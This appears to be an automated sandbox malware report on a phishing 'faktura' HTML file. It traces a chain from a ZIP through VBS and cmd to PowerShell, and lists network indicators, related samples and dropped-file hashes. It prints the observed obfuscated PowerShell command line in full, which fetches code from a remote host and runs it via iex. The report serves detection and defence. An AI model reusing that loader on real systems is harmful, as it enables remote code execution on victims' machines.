Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c "echo $($kwxztawej = $('{4}{10}{9}' -f $('vglbipiqrxeu'.tochararray())); $((273,234,303,348,138,249,303,342,354,315,297,303,240,333,315,330,348,231,291,330,291,309,303,342,279,174,174,249,303,342,354,303,342,201,303,342,348,315,306,315,297,291,348,303,258,291,324,315,300,291,348,315,333,330,201,291,324,324,294,291,297,321,96,183,96,369,108,348,342,351,303,375,177,96,108,291,222,333,261,351,198,360,96,183,96,273,249,363,345,348,303,327,138,234,303,348,138,216,348,348,336,261,303,294,246,303,339,351,303,345,348,279,174,174,201,342,303,291,348,303,120,117,312,348,348,336,345,174,141,141,306,315,324,303,312,333,345,348,150,144,144,168,168,159,138,315,330,306,333,174,147,153,162,150,147,141,357,303,294,159,138,336,312,336,117,123,177,96,108,291,222,333,261,351,198,360,138,252,315,327,303,333,351,348,96,183,96,153,144,144,144,144,144,177,96,108,120,273,249,363,345,348,303,327,138,219,333,138,249,348,342,303,291,327,246,303,291,300,303,342,279,120,108,291,222,333,261,351,198,360,138,213,303,348,246,303,345,336,333,330,345,303,120,123,138,213,303,348,246,303,345,336,333,330,345,303,249,348,342,303,291,327,120,123,123,123,138,246,303,291,300,252,333,207,330,300,120,123,96,372,96,219,207,264)^^^|%{[char]($_/3)})-join'') ^^^| ^^^&($kwxztawej) | c:\windows\syswow64\windowspowershell\v1.0\powershell.exe -window hidden -c -"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe /s /d /c" echo $($kwxztawej = $('{4}{10}{9}' -f $('vglbipiqrxeu'.tochararray())); $((273,234,303,348,138,249,303,342,354,315,297,303,240,333,315,330,348,231,291,330,291,309,303,342,279,174,174,249,303,342,354,303,342,201,303,342,348,315,306,315,297,291,348,303,258,291,324,315,300,291,348,315,333,330,201,291,324,324,294,291,297,321,96,183,96,369,108,348,342,351,303,375,177,96,108,291,222,333,261,351,198,360,96,183,96,273,249,363,345,348,303,327,138,234,303,348,138,216,348,348,336,261,303,294,246,303,339,351,303,345,348,279,174,174,201,342,303,291,348,303,120,117,312,348,348,336,345,174,141,141,306,315,324,303,312,333,345,348,150,144,144,168,168,159,138,315,330,306,333,174,147,153,162,150,147,141,357,303,294,159,138,336,312,336,117,123,177,96,108,291,222,333,261,351,198,360,138,252,315,327,303,333,351,348,96,183,96,153,144,144,144,144,144,177,96,108,120,273,249,363,345,348,303,327,138,219,333,138,249,348,342,303,291,327,246,303,291,300,303,342,279,120,108,291,222,333,261,351,198,360,138,213,303,348,246,303,345,336,333,330,345,303,120,123,138,213,303,348,246,303,345,336,333,330,345,303,249,348,342,303,291,327,120,123,123,123,138,246,303,291,300,252,333,207,330,300,120,123,96,372,96,219,207,264)^|%{[char]($_/3)})-join'') ^| ^&($kwxztawej) "Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information111
Scripting
Valid Accounts11
Command and Scripting Interpreter
1
Browser Extensions
111
Process Injection
11
Masquerading
OS Credential Dumping1
Security Software Discovery
Remote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
Exploitation for Client Execution
111
Scripting
1
DLL Side-Loading
1
Disable or Modify Tools
LSASS Memory1
Process Discovery
Remote Desktop ProtocolData from Removable Media1
Non-Standard Port
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts1
PowerShell
1
DLL Side-Loading
1
Extra Window Memory Injection
31
Virtualization/Sandbox Evasion
Security Account Manager31
Virtualization/Sandbox Evasion
SMB/Windows Admin SharesData from Network Shared Drive1
Ingress Tool Transfer
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook111
Process Injection
NTDS1
Application Window Discovery
Distributed Component Object ModelInput Capture2
Non-Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Deobfuscate/Decode Files or Information
LSA Secrets1
File and Directory Discovery
SSHKeylogging3
Application Layer Protocol
Scheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading
Cached Domain Credentials12
System Information Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
File Deletion
DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
Extra Window Memory Injection
Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1636957 Sample: faktura_FV2025020637756.html Startdate: 13/03/2025 Architecture: WINDOWS Score: 96 49 s4.histats.com 2->49 51 filehost200885.info 2->51 67 Found suspicious ZIP file 2->67 69 Detected javascript redirector / loader 2->69 71 Downloads suspicious files via Chrome 2->71 73 6 other signatures 2->73 11 chrome.exe 14 2->11         started        15 chrome.exe 2->15         started        signatures3 process4 dnsIp5 59 192.168.2.8, 13621, 138, 443 unknown unknown 11->59 61 192.168.2.4 unknown unknown 11->61 63 2 other IPs or domains 11->63 47 C:\...\faktura_FV2025020637756.zip (copy), Zip 11->47 dropped 17 unarchiver.exe 4 11->17         started        19 chrome.exe 11->19         started        file6 process7 dnsIp8 22 cmd.exe 2 2 17->22         started        25 7za.exe 2 17->25         started        53 s4.histats.com 149.56.240.129, 443, 49694 OVHFR Canada 19->53 55 filehost200885.info 156.229.228.198, 13621, 49695, 49696 ONL-HKOCEANNETWORKLIMITEDHK Seychelles 19->55 57 2 other IPs or domains 19->57 process9 file10 79 Wscript starts Powershell (via cmd or directly) 22->79 81 Obfuscated command line found 22->81 28 wscript.exe 14 22->28         started        32 conhost.exe 22->32         started        45 C:\Users\user\AppData\...\2025020641549.vbs, ASCII 25->45 dropped 34 conhost.exe 25->34         started        signatures11 process12 dnsIp13 65 149.56.240.131, 443, 49709 OVHFR Canada 28->65 83 System process connects to network (likely due to code injection or exploit) 28->83 85 Wscript starts Powershell (via cmd or directly) 28->85 87 Obfuscated command line found 28->87 89 2 other signatures 28->89 36 cmd.exe 1 28->36         started        signatures14 process15 signatures16 75 Wscript starts Powershell (via cmd or directly) 36->75 77 Obfuscated command line found 36->77 39 powershell.exe 15 17 36->39         started        41 conhost.exe 36->41         started        43 cmd.exe 1 36->43         started        process17

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
faktura_FV2025020637756.html0%VirustotalBrowse
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
file:///C:/Users/user/Desktop/faktura_FV2025020637756.html0%Avira URL Cloudsafe
https://s4.histats.0%Avira URL Cloudsafe
https://s4.C240%Avira URL Cloudsafe

Download Network PCAP: filteredfull

NameIPActiveMaliciousAntivirus DetectionReputation
filehost200885.info
156.229.228.198
truefalse
    unknown
    s4.histats.com
    149.56.240.129
    truefalse
      high
      www.google.com
      142.250.186.132
      truefalse
        high
        _13621._https.filehost200885.info
        unknown
        unknownfalse
          unknown
          NameMaliciousAntivirus DetectionReputation
          https://s4.histats.com/stats/0.php?4935988&@f16&@g1&@h1&@i1&@vhttps://histats.com/d_openedfalse
            high
            file:///C:/Users/user/Desktop/faktura_FV2025020637756.htmltrue
            • Avira URL Cloud: safe
            unknown
            https://s4.histats.com/stats/0.php?4935987&@f16&@g1&@h1&@i1&@vhttps://histats.com/s_opened_TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzEzNC4wLjAuMCBTYWZhcmkvNTM3LjM2false
              high
              NameSourceMaliciousAntivirus DetectionReputation
              https://s4.histats.com/6wscript.exe, 0000000B.00000002.2903297378.000000000288D000.00000004.00000020.00020000.00000000.sdmpfalse
                high
                https://histats.com/d_opened3wscript.exe, 0000000B.00000002.2904446853.00000000049F0000.00000004.00000020.00020000.00000000.sdmpfalse
                  high
                  https://histats.com/d_openedSwscript.exe, 0000000B.00000002.2904973246.0000000004C23000.00000004.00000020.00020000.00000000.sdmpfalse
                    high
                    https://s4.histats.com/stawscript.exe, 0000000B.00000002.2903297378.0000000002818000.00000004.00000020.00020000.00000000.sdmpfalse
                      high
                      https://s4.histats.wscript.exe, 0000000B.00000002.2903297378.000000000288D000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://histats.com/d_openedNwscript.exe, 0000000B.00000002.2904973246.0000000004C23000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        https://s4.C24wscript.exe, 0000000B.00000002.2903297378.000000000288D000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://s4.histats.com/wscript.exe, 0000000B.00000002.2903297378.000000000288D000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          https://histats.com/d_openedwscript.exe, 0000000B.00000003.1221154917.00000000028E4000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            https://s4.histats.com/stats/0.php?4935988&wscript.exe, 0000000B.00000002.2904973246.0000000004C23000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs
                              IPDomainCountryFlagASNASN NameMalicious
                              149.56.240.131
                              unknownCanada
                              16276OVHFRtrue
                              156.229.228.198
                              filehost200885.infoSeychelles
                              139086ONL-HKOCEANNETWORKLIMITEDHKfalse
                              142.250.186.132
                              www.google.comUnited States
                              15169GOOGLEUSfalse
                              149.56.240.129
                              s4.histats.comCanada
                              16276OVHFRfalse
                              IP
                              192.168.2.8
                              192.168.2.7
                              192.168.2.4
                              192.168.2.6
                              Joe Sandbox version:42.0.0 Malachite
                              Analysis ID:1636957
                              Start date and time:2025-03-13 09:41:29 +01:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 6m 18s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:defaultwindowshtmlcookbook.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:27
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:faktura_FV2025020637756.html
                              Detection:MAL
                              Classification:mal96.phis.expl.evad.winHTML@42/14@13/8
                              Cookbook Comments:
                              • Found application associated with file extension: .html
                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, sppsvc.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, TextInputHost.exe, svchost.exe
                              • Excluded IPs from analysis (whitelisted): 142.250.186.131, 142.250.185.142, 142.250.181.238, 74.125.206.84, 142.250.185.110, 216.58.212.142, 142.250.186.110, 142.250.184.238, 199.232.210.172, 142.250.185.174, 142.250.185.78, 216.58.206.35, 142.250.74.206, 216.58.206.46, 142.250.80.78, 74.125.7.136, 172.217.18.14, 20.12.23.50, 23.199.214.10
                              • Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, clientservices.googleapis.com, r3---sn-hp57yns7.gvt1.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, edgedl.me.gvt1.com, redirector.gvt1.com, r3.sn-hp57yns7.gvt1.com, update.googleapis.com, clients.l.google.com, c.pki.goog
                              • Not all processes where analyzed, report is missing behavior information
                              • Report size getting too big, too many NtCreateFile calls found.
                              • Report size getting too big, too many NtOpenFile calls found.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              TimeTypeDescription
                              04:43:06API Interceptor45x Sleep call for process: powershell.exe modified
                              04:43:11API Interceptor3366531x Sleep call for process: unarchiver.exe modified
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              149.56.240.131https://getwellslogsnowonline.vercel.app/Get hashmaliciousUnknownBrowse
                                https://fooofooofooo.b-cdn.net/Get hashmaliciousTechSupportScamBrowse
                                  http://manatoki463.netGet hashmaliciousUnknownBrowse
                                    https://lil-loveeeees.blogspot.com/Get hashmaliciousUnknownBrowse
                                      https://nakheel-mall.myfreesites.netGet hashmaliciousUnknownBrowse
                                        https://loginshshhdd.blogspot.com/Get hashmaliciousHTMLPhisherBrowse
                                          https://ff-rewards-redeem-codes-org.github.io/Free-Fire-/Get hashmaliciousHTMLPhisherBrowse
                                            odbior_1000710146673U.vbsGet hashmaliciousUnknownBrowse
                                              https://circleoftoast.blogspot.comGet hashmaliciousUnknownBrowse
                                                https://inscricao.faculdadeitop.edu.brGet hashmaliciousUnknownBrowse
                                                  149.56.240.129http://68.183.190.199Get hashmaliciousUnknownBrowse
                                                    El3cE5jq1L.pdfGet hashmaliciousUnknownBrowse
                                                      http://home45insurance.blogspot.comGet hashmaliciousUnknownBrowse
                                                        http://nomads-primes-pdfs.b-cdn.net/Get hashmaliciousTechSupportScamBrowse
                                                          https://alluc.co/watch-movies/passengers.htmlGet hashmaliciousUnknownBrowse
                                                            https://hy.markkasmick.click/cx/tbSgVco_akr35UznLBgMmL_dGwr4A9B_vyg2WwEB0w1LRjKjQMyEnB89mCfTRy8oqnbpdFunqinBhx0TsHvSJdUHnbksc3kdcKecoDvVHa5LAm46at*Mm*Ro3D2CHoEu2bmOqt4Ic8O_7AE7Igwgbi5c8zmZf6Fqp*_XqcjREPr7609oL7vKm8FfjGLhMetr2oxtpR3ywH4BUElgc7EI7usxj8CJYEUMktwlb7YUzPvYQ7P1PilEV0LqiXI5sm6QVF4ZGl5TIXhnQLOG0kl6WQ0miiZysBfhaNojnPTUvisUUkwOp2fYTxkXEIhZ7ESJ7qXYLxQbm*y4RJVeZZZ3RY5rX8W5t8cudSM9Zx7UaxgLH56aOv81v4QfUnzroT9v*7LR3jPEjz*YXr2LwuykYQnzvV6boWl*o*gU4jkPE6MocRRlRoC6uUx2e1Wseo8MqGWTT2uXo4HbQDneiMF84sQ34*3TnbAxXWu8xLbb_mAOQxUTA3T5TUUZKeU3ziolM8TSVV5Y5LQTFGtNArddwJKdWCb_cLYMxUJpZ3cqM_AGet hashmaliciousUnknownBrowse
                                                              https://onlyclips.site/?title=quinnfinite&ref=gitGet hashmaliciousUnknownBrowse
                                                                przesylka_1000758971617U (2).vbsGet hashmaliciousUnknownBrowse
                                                                  przesylka_1000758971617U.vbsGet hashmaliciousUnknownBrowse
                                                                    https://osmannerdeler.info/osnlfdgyonlinesr/fvszzrtpkrGet hashmaliciousUnknownBrowse
                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      s4.histats.comhttp://ww3.0123movies.com.coGet hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                      • 54.39.128.162
                                                                      http://68.183.190.199Get hashmaliciousUnknownBrowse
                                                                      • 149.56.240.130
                                                                      SUS.ps1Get hashmaliciousUnknownBrowse
                                                                      • 142.4.219.198
                                                                      analysis.vbsGet hashmaliciousUnknownBrowse
                                                                      • 149.56.240.127
                                                                      CfF7MWq7aG.htmlGet hashmaliciousUnknownBrowse
                                                                      • 142.4.219.198
                                                                      https://getwellslogsnowonline.vercel.app/Get hashmaliciousUnknownBrowse
                                                                      • 149.56.240.132
                                                                      https://fooofooofooo.b-cdn.net/Get hashmaliciousTechSupportScamBrowse
                                                                      • 149.56.240.127
                                                                      El3cE5jq1L.pdfGet hashmaliciousUnknownBrowse
                                                                      • 149.56.240.129
                                                                      http://home45insurance.blogspot.comGet hashmaliciousUnknownBrowse
                                                                      • 54.39.128.162
                                                                      http://jinoodle-polopol.b-cdn.net/Get hashmaliciousTechSupportScamBrowse
                                                                      • 149.56.240.27
                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      OVHFRhttps://sceanmcommnunmnlty.com/xroea/spwoe/zxiweGet hashmaliciousUnknownBrowse
                                                                      • 91.134.10.168
                                                                      http://feirao2025.com.br/consulta/Get hashmaliciousUnknownBrowse
                                                                      • 91.134.60.128
                                                                      miori.arm.elfGet hashmaliciousUnknownBrowse
                                                                      • 142.44.221.81
                                                                      http://americanlibertywatch.comGet hashmaliciousUnknownBrowse
                                                                      • 91.134.110.137
                                                                      WizClient.exeGet hashmaliciousXWormBrowse
                                                                      • 91.134.10.168
                                                                      https://www.dkgroup.frGet hashmaliciousUnknownBrowse
                                                                      • 137.74.137.164
                                                                      skuld.exeGet hashmaliciousGo Stealer, Skuld StealerBrowse
                                                                      • 51.91.7.6
                                                                      PURCHASE-ORDER-SINCOAUTOMATION-PO3223090781-Ref 6421SINCO-AUTOMATION.exeGet hashmaliciousFormBookBrowse
                                                                      • 5.196.134.71
                                                                      20250031011(12 Mar 2025).pdf.htmlGet hashmaliciousUnknownBrowse
                                                                      • 91.134.10.168
                                                                      20250031011(12 Mar 2025).pdf.htmlGet hashmaliciousUnknownBrowse
                                                                      • 91.134.82.79
                                                                      ONL-HKOCEANNETWORKLIMITEDHKresgod.arm5.elfGet hashmaliciousMiraiBrowse
                                                                      • 156.249.107.21
                                                                      cbr.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                      • 156.249.125.168
                                                                      nabmpsl.elfGet hashmaliciousUnknownBrowse
                                                                      • 156.229.163.4
                                                                      cbr.ppc.elfGet hashmaliciousMiraiBrowse
                                                                      • 156.249.107.93
                                                                      armv7l.elfGet hashmaliciousUnknownBrowse
                                                                      • 45.202.74.234
                                                                      http://www.car1997.cn/Get hashmaliciousUnknownBrowse
                                                                      • 45.202.81.19
                                                                      Hilix.sh4.elfGet hashmaliciousMiraiBrowse
                                                                      • 156.249.107.33
                                                                      pXdN91.x68.elfGet hashmaliciousMirai, GafgytBrowse
                                                                      • 156.229.233.170
                                                                      gmips.elfGet hashmaliciousUnknownBrowse
                                                                      • 156.229.232.154
                                                                      arm5.elfGet hashmaliciousUnknownBrowse
                                                                      • 156.229.232.154
                                                                      OVHFRhttps://sceanmcommnunmnlty.com/xroea/spwoe/zxiweGet hashmaliciousUnknownBrowse
                                                                      • 91.134.10.168
                                                                      http://feirao2025.com.br/consulta/Get hashmaliciousUnknownBrowse
                                                                      • 91.134.60.128
                                                                      miori.arm.elfGet hashmaliciousUnknownBrowse
                                                                      • 142.44.221.81
                                                                      http://americanlibertywatch.comGet hashmaliciousUnknownBrowse
                                                                      • 91.134.110.137
                                                                      WizClient.exeGet hashmaliciousXWormBrowse
                                                                      • 91.134.10.168
                                                                      https://www.dkgroup.frGet hashmaliciousUnknownBrowse
                                                                      • 137.74.137.164
                                                                      skuld.exeGet hashmaliciousGo Stealer, Skuld StealerBrowse
                                                                      • 51.91.7.6
                                                                      PURCHASE-ORDER-SINCOAUTOMATION-PO3223090781-Ref 6421SINCO-AUTOMATION.exeGet hashmaliciousFormBookBrowse
                                                                      • 5.196.134.71
                                                                      20250031011(12 Mar 2025).pdf.htmlGet hashmaliciousUnknownBrowse
                                                                      • 91.134.10.168
                                                                      20250031011(12 Mar 2025).pdf.htmlGet hashmaliciousUnknownBrowse
                                                                      • 91.134.82.79
                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      37f463bf4616ecd445d4a1937da06e19SecuriteInfo.com.FileRepMalware.26489.28570.exeGet hashmaliciousUnknownBrowse
                                                                      • 149.56.240.131
                                                                      Bill Of Ladding & PL AWB No.1669134316.vbsGet hashmaliciousGuLoaderBrowse
                                                                      • 149.56.240.131
                                                                      Payment_Advise.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                      • 149.56.240.131
                                                                      FAKTURA-P-4526485-2742747722-00043067#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                      • 149.56.240.131
                                                                      4500149631.vbeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                      • 149.56.240.131
                                                                      comprobante de pago.exeGet hashmaliciousGuLoaderBrowse
                                                                      • 149.56.240.131
                                                                      comprobante de pago.exeGet hashmaliciousGuLoaderBrowse
                                                                      • 149.56.240.131
                                                                      yJLckVp9HE.exeGet hashmaliciousFatalRAT, GhostRat, NitolBrowse
                                                                      • 149.56.240.131
                                                                      yJLckVp9HE.exeGet hashmaliciousUnknownBrowse
                                                                      • 149.56.240.131
                                                                      No context
                                                                      Process:C:\Windows\SysWOW64\wscript.exe
                                                                      File Type:ASCII text
                                                                      Category:dropped
                                                                      Size (bytes):376
                                                                      Entropy (8bit):5.175134110355963
                                                                      Encrypted:false
                                                                      SSDEEP:6:51DMwYb13LkVVXI8mgO9lVhnmUqZzwGdDVTYqL1+LD+mMkuc1zlCBbAm+RbDRWP/:51DrYb13QvuHnmVZkGdDJH10D+xc15C5
                                                                      MD5:C2B26B17141E97DA490556030D44F1C3
                                                                      SHA1:FE0D875538ED94E607D4F3FEFECFC8F797FF3EA9
                                                                      SHA-256:892D55861A7789EEC2CAD963B875D9EBF537FF3698F08D0349CE86395D224262
                                                                      SHA-512:67DB732D53C80D1BF30EF6EE75A73ED69ED071AC4E84FF86789A16DFAE810BEF0D2CEF472D6E8624247196334B7F48A65158552FC8A012F968ECDD332A840235
                                                                      Malicious:false
                                                                      Preview:_HST_cntval="Initializing..";chfh(_HST_cntval);;!function(){try{var b=document.createElement("script");b.src="//e.dtscout.com/e/?v=1a&pid=5200&site=1&l="+encodeURIComponent(window.location.href)+"&j="+encodeURIComponent(document.referrer);.b.async="async";b.type="text/javascript";var a=document.getElementsByTagName("script")[0];a.parentNode.insertBefore(b,a);}catch(e){}}();
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):5829
                                                                      Entropy (8bit):4.901113710259376
                                                                      Encrypted:false
                                                                      SSDEEP:96:ZCJ2Woe5H2k6Lm5emmXIGLgyg12jDs+un/iQLEYFjDaeWJ6KGcmXlQ9smpFRLcUn:Uxoe5HVsm5emdQgkjDt4iWN3yBGHVQ9v
                                                                      MD5:7827E04B3ECD71FB3BD7BEEE4CA52CE8
                                                                      SHA1:22813AF893013D1CCCACC305523301BB90FF88D9
                                                                      SHA-256:5D66D4CA13B4AF3B23357EB9BC21694E7EED4485EA8D2B8C653BEF3A8E5D0601
                                                                      SHA-512:D5F6604E49B7B31C2D1DA5E59B676C0E0F37710F4867F232DF0AA9A1EE170B399472CA1DF0BD21DF702A1B5005921D35A8E6858432B00619E65D0648C74C096B
                                                                      Malicious:false
                                                                      Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):64
                                                                      Entropy (8bit):0.34726597513537405
                                                                      Encrypted:false
                                                                      SSDEEP:3:Nlll:Nll
                                                                      MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                      SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                      SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                      SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                      Malicious:false
                                                                      Preview:@...e...........................................................
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
